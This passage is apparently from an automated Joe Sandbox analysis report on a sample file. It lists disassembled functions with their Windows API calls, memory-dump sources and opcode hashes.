                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientMoveRectScreen
                                                                            • String ID:
                                                                            • API String ID: 3880355969-0
                                                                            • Opcode ID: 2f9f8a0e416bd5ca4bd2cb1387902badd43ed0d89c91a26e3f5924d96f204930
                                                                            • Instruction ID: 30e125110d4010096be740bd2ab4269b53fababcb90f6496a973288455d8c98a
                                                                            • Opcode Fuzzy Hash: 2f9f8a0e416bd5ca4bd2cb1387902badd43ed0d89c91a26e3f5924d96f204930
                                                                            • Instruction Fuzzy Hash: 68516D75A10208EFCF12DF68C880ABE7BB9EB46320F15D259F9959B295D730ED41CB90
                                                                            Function 0033C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0033C462
                                                                            • __itow.LIBCMT ref: 0033C49C
                                                                              • Part of subcall function 0033C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0033C753
                                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0033C505
                                                                            • __itow.LIBCMT ref: 0033C55A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$__itow
                                                                            • String ID:
                                                                            • API String ID: 3379773720-0
                                                                            • Opcode ID: ec372fd7b3c5c282afbceb8e856b3d84cb7d8564b444293f89a8090c6f53b8e1
                                                                            • Instruction ID: 451bf3543c2beb2831f878b127f32d44f5d079ac7bff0a3d253035b6845853a2
                                                                            • Opcode Fuzzy Hash: ec372fd7b3c5c282afbceb8e856b3d84cb7d8564b444293f89a8090c6f53b8e1
                                                                            • Instruction Fuzzy Hash: E7418271A00208AFDF27DF55C892BEE7BB9AF49700F001059FA05BB291DB749A45CBA1
                                                                            Function 0034390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00343966
                                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00343982
                                                                            • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003439EF
                                                                            • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00343A4D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: f611b9b643fb0137a80c18a4acad335586d1989624d6068e2a8fed9394626a74
                                                                            • Instruction ID: e42e130f5e7fe179499169f7c4b24ddfaa031d0634c2c1ca968bb9e7dd816b01
                                                                            • Opcode Fuzzy Hash: f611b9b643fb0137a80c18a4acad335586d1989624d6068e2a8fed9394626a74
                                                                            • Instruction Fuzzy Hash: 48410970E44248AAEF238B64C805BFDBBF9AB55310F04015AF5C1AF2C1C7B4AE85D765
                                                                            Function 0036B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0036B5D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 634782764-0
                                                                            • Opcode ID: 17fd1bc6a981bcc2c46ad6ab1ce45db24636f80ca6de13a80dcf0e5dfeaeec1c
                                                                            • Instruction ID: 1716703ac7a3118c591c558e0904d15f1f9af9495a028e5207e76de54a67d2be
                                                                            • Opcode Fuzzy Hash: 17fd1bc6a981bcc2c46ad6ab1ce45db24636f80ca6de13a80dcf0e5dfeaeec1c
                                                                            • Instruction Fuzzy Hash: 9731DE34601208ABEB238F18CC89FE8B769AB06350F61C111FA52D62E9D730A9D09F52
                                                                            Function 0036D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ClientToScreen.USER32(?,?), ref: 0036D807
                                                                            • GetWindowRect.USER32(?,?), ref: 0036D87D
                                                                            • PtInRect.USER32(?,?,0036ED5A), ref: 0036D88D
                                                                            • MessageBeep.USER32(00000000), ref: 0036D8FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1352109105-0
                                                                            • Opcode ID: 2d8c720fff89dcb115e190644bc63df3a9e4c2f2761e76d64e3f5b377523036c
                                                                            • Instruction ID: d5e34a73949c261e98799b505687e9dfb82a5e4d098d8862c9c6ce312c24a780
                                                                            • Opcode Fuzzy Hash: 2d8c720fff89dcb115e190644bc63df3a9e4c2f2761e76d64e3f5b377523036c
                                                                            • Instruction Fuzzy Hash: 03416A71F00219DFCB13DF59D888EA9BBF9BB46354F1981A9E814DB269D730E941CB40
                                                                            Function 00343A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,76AAC0D0,?,00008000), ref: 00343AB8
                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00343AD4
                                                                            • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00343B34
                                                                            • SendInput.USER32(00000001,?,0000001C,76AAC0D0,?,00008000), ref: 00343B92
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: f7467eadd723459144ef94d7bd131361132d8c0ddc15fb5e2974bc9ce98dfeee
                                                                            • Instruction ID: a3cdf0a49eb5bcf41af61b9ee069d16f1210ffb0714942b2b3dae624eca57dd3
                                                                            • Opcode Fuzzy Hash: f7467eadd723459144ef94d7bd131361132d8c0ddc15fb5e2974bc9ce98dfeee
                                                                            • Instruction Fuzzy Hash: B3310430A04258AEEF238B648819BFEBBE9DF55310F05015AE481AF2D1C774AB45DB62
                                                                            Function 00334004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00334038
                                                                            • __isleadbyte_l.LIBCMT ref: 00334066
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00334094
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003340CA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: a410d6b1275c59e43e15c4077b685ac6c01616c39b903243845e93b81a38abde
                                                                            • Instruction ID: 0764a384a2e372765f04c4250fce9fe0e5e2cf4c6bef7877c2568266048aeb3a
                                                                            • Opcode Fuzzy Hash: a410d6b1275c59e43e15c4077b685ac6c01616c39b903243845e93b81a38abde
                                                                            • Instruction Fuzzy Hash: 7531C431704216EFDB2B9F74C884B7ABBA9FF41310F164428E6658B1A1E731E890D790
                                                                            Function 00367CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 00367CB9
                                                                              • Part of subcall function 00345F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00345F6F
                                                                              • Part of subcall function 00345F55: GetCurrentThreadId.KERNEL32 ref: 00345F76
                                                                              • Part of subcall function 00345F55: AttachThreadInput.USER32(00000000,?,0034781F), ref: 00345F7D
                                                                            • GetCaretPos.USER32(?), ref: 00367CCA
                                                                            • ClientToScreen.USER32(00000000,?), ref: 00367D03
                                                                            • GetForegroundWindow.USER32 ref: 00367D09
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                            • String ID:
                                                                            • API String ID: 2759813231-0
                                                                            • Opcode ID: 262a6abbf5eda2842396f78105357fdd5df49ad4c847d84152d4e401ad7588ab
                                                                            • Instruction ID: 95cc102e8f2f909dcde97ba300e0773524813cc0f58d02b9c2b97d2f89c59ff4
                                                                            • Opcode Fuzzy Hash: 262a6abbf5eda2842396f78105357fdd5df49ad4c847d84152d4e401ad7588ab
                                                                            • Instruction Fuzzy Hash: 00312F71D00108AFDB01EFA9CC459EFBBFDEF58314B108466E815E7212DA31AE558BA0
                                                                            Function 0036F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
                                                                            • GetCursorPos.USER32(?), ref: 0036F211
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0037E4C0,?,?,?,?,?), ref: 0036F226
                                                                            • GetCursorPos.USER32(?), ref: 0036F270
                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0037E4C0,?,?,?), ref: 0036F2A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                            • String ID:
                                                                            • API String ID: 2864067406-0
                                                                            • Opcode ID: d6416ad7ea1ccd80d28c0256071e6c36c9465732eeaf5d74f8ed11506aed0dbf
                                                                            • Instruction ID: fcde085c9ee54a22c45cb1c8174fb39c2261fae1847599d7f21dc40682b5f240
                                                                            • Opcode Fuzzy Hash: d6416ad7ea1ccd80d28c0256071e6c36c9465732eeaf5d74f8ed11506aed0dbf
                                                                            • Instruction Fuzzy Hash: F521A23D500118AFCB178F55D868EEA7BB9EF0A710F148469F9058B2A6D3309D60DF50
                                                                            Function 0035431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00354358
                                                                              • Part of subcall function 003543E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00354401
                                                                              • Part of subcall function 003543E2: InternetCloseHandle.WININET(00000000), ref: 0035449E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$CloseConnectHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 1463438336-0
                                                                            • Opcode ID: b3b30953ea2dcdaf7793932914b6df0de9e96489ec8d683f1013bc1cfdc9e5d8
                                                                            • Instruction ID: fcbc28742aa603d815b345a44535f226484ca68a65fe00e834bf31ab3c7522b0
                                                                            • Opcode Fuzzy Hash: b3b30953ea2dcdaf7793932914b6df0de9e96489ec8d683f1013bc1cfdc9e5d8
                                                                            • Instruction Fuzzy Hash: A621AC79200601BBEB1B9F609C00FBAB7ADBF4471AF01401ABA15966B0DB7198699B90
                                                                            Function 00368A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00368AA6
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00368AC0
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00368ACE
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00368ADC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$AttributesLayered
                                                                            • String ID:
                                                                            • API String ID: 2169480361-0
                                                                            • Opcode ID: 9d7cbc74971b53394b35f4c400a56b863e54afb7ccaa53cb42951c22dcbdf535
                                                                            • Instruction ID: 6b4ccc2d9f3814c0399c5a0752c32e0ecffd2d413c10aa678bc736e1082ba7c5
                                                                            • Opcode Fuzzy Hash: 9d7cbc74971b53394b35f4c400a56b863e54afb7ccaa53cb42951c22dcbdf535
                                                                            • Instruction Fuzzy Hash: 7D11D031346111AFDB06AB58CC19FBA779DAF89320F148219F916CB2E2CF70AC008794
                                                                            Function 00358A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00358AE0
                                                                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00358AF2
                                                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00358AFF
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00358B16
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastacceptselect
                                                                            • String ID:
                                                                            • API String ID: 385091864-0
                                                                            • Opcode ID: 4bb79856caf2edec0e3bda3568f54708329db9899e8a7e4e72e1d06e0f32b822
                                                                            • Instruction ID: 56333d6753bb9af978cb4e10818a0b982ba13d320fa6ca8ae1b368c969af1190
                                                                            • Opcode Fuzzy Hash: 4bb79856caf2edec0e3bda3568f54708329db9899e8a7e4e72e1d06e0f32b822
                                                                            • Instruction Fuzzy Hash: B5216372A001249FC7169F69C885EDEBBECEF49350F0041AAF849EB291DB749A458F90
                                                                            Function 00340AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00341E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00340ABB,?,?,?,0034187A,00000000,000000EF,00000119,?,?), ref: 00341E77
                                                                              • Part of subcall function 00341E68: lstrcpyW.KERNEL32(00000000,?,?,00340ABB,?,?,?,0034187A,00000000,000000EF,00000119,?,?,00000000), ref: 00341E9D
                                                                              • Part of subcall function 00341E68: lstrcmpiW.KERNEL32(00000000,?,00340ABB,?,?,?,0034187A,00000000,000000EF,00000119,?,?), ref: 00341ECE
                                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0034187A,00000000,000000EF,00000119,?,?,00000000), ref: 00340AD4
                                                                            • lstrcpyW.KERNEL32(00000000,?,?,0034187A,00000000,000000EF,00000119,?,?,00000000), ref: 00340AFA
                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,0034187A,00000000,000000EF,00000119,?,?,00000000), ref: 00340B2E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                            • String ID: cdecl
                                                                            • API String ID: 4031866154-3896280584
                                                                            • Opcode ID: bdcdbbbf024ade73c8379739a23b185c9f56149229d242c00601302e12fd8aa2
                                                                            • Instruction ID: 45bccef1d78b20b56ca1423ea7b41fad058e8f4afb149901dba033fc7bb096f9
                                                                            • Opcode Fuzzy Hash: bdcdbbbf024ade73c8379739a23b185c9f56149229d242c00601302e12fd8aa2
                                                                            • Instruction Fuzzy Hash: C911B43A200305AFDB2A9F74DC45D7A77E8FF45354B80416AE906CF2A0EB71E851C7A4
                                                                            Function 00332F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 00332FB5
                                                                              • Part of subcall function 0032395C: __FF_MSGBANNER.LIBCMT ref: 00323973
                                                                              • Part of subcall function 0032395C: __NMSG_WRITE.LIBCMT ref: 0032397A
                                                                              • Part of subcall function 0032395C: RtlAllocateHeap.NTDLL(00D00000,00000000,00000001,00000001,00000000,?,?,0031F507,?,0000000E), ref: 0032399F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap_free
                                                                            • String ID:
                                                                            • API String ID: 614378929-0
                                                                            • Opcode ID: 4648cdea1f444e04728b49690bbc0d3ec3f454a9a34d97a5075ccc95bade8daf
                                                                            • Instruction ID: 1bce64979f35956ff5ff7a1effdc17f969968cfc0ef5c708f1dbbd20d8b931c1
                                                                            • Opcode Fuzzy Hash: 4648cdea1f444e04728b49690bbc0d3ec3f454a9a34d97a5075ccc95bade8daf
                                                                            • Instruction Fuzzy Hash: FD11AC31509231ABDB373F74BC85A6A3BACBF14360F218525F849DE161DB74CD409790
                                                                            Function 0031EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0031EBB2
                                                                              • Part of subcall function 003051AF: _memset.LIBCMT ref: 0030522F
                                                                              • Part of subcall function 003051AF: _wcscpy.LIBCMT ref: 00305283
                                                                              • Part of subcall function 003051AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00305293
                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 0031EC07
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0031EC16
                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00373C88
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1378193009-0
                                                                            • Opcode ID: 5e44b4b62673d3bd719532f2c15b6286be7583908b35209677328ca265714a15
                                                                            • Instruction ID: c434efabc05a87d8cbe40e368d6ad201c7c9498936f7a877a603c268838911d2
                                                                            • Opcode Fuzzy Hash: 5e44b4b62673d3bd719532f2c15b6286be7583908b35209677328ca265714a15
                                                                            • Instruction Fuzzy Hash: 8C21F674904794AFE7379B28CC59FE7BFEC9B05308F05048DE68E6A282C3752A84DB51
                                                                            Function 0034058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003405AC
                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003405C7
                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003405DD
                                                                            • FreeLibrary.KERNEL32(?), ref: 00340632
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
